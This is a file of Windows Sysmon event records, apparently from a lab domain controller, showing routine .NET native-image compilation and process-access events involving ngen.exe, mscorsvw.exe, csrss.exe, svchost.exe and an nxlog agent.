{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8362,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:08.638\r\nProcessGuid: {E2A3D6B1-136A-5F25-0000-0010D49E0E00}\r\nProcessId: 4564\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11d4-0\\System.Design.dll\r\nCreationUtcTime: 2020-08-01 07:02:08.638","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:08.638","ProcessGuid":"{E2A3D6B1-136A-5F25-0000-0010D49E0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11d4-0\\System.Design.dll","CreationUtcTime":"2020-08-01 07:02:08.638","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8363,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.826\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1370-5F25-0000-0010E8BD0E00}\r\nTargetProcessId: 4696\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.826","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1370-5F25-0000-0010E8BD0E00}","TargetProcessId":"4696","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8364,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.826\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1370-5F25-0000-0010E8BD0E00}\r\nTargetProcessId: 4696\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.826","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1370-5F25-0000-0010E8BD0E00}","TargetProcessId":"4696","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8365,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.826\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1370-5F25-0000-0010E8BD0E00}\r\nTargetProcessId: 4696\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.826","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1370-5F25-0000-0010E8BD0E00}","TargetProcessId":"4696","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8366,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.873\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00104BC70C00}\r\nTargetProcessId: 792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.873","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00104BC70C00}","TargetProcessId":"792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8367,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.873\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00104BC70C00}\r\nTargetProcessId: 792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.873","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00104BC70C00}","TargetProcessId":"792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8368,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00104BC70C00}\r\nTargetProcessId: 792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00104BC70C00}","TargetProcessId":"792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8369,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.904\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.904","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8370,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:08.951\r\nProcessGuid: {E2A3D6B1-1370-5F25-0000-001061C10E00}\r\nProcessId: 792\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\318-0\\System.Device.dll\r\nCreationUtcTime: 2020-08-01 07:02:08.951","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:08.951","ProcessGuid":"{E2A3D6B1-1370-5F25-0000-001061C10E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\318-0\\System.Device.dll","CreationUtcTime":"2020-08-01 07:02:08.951","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
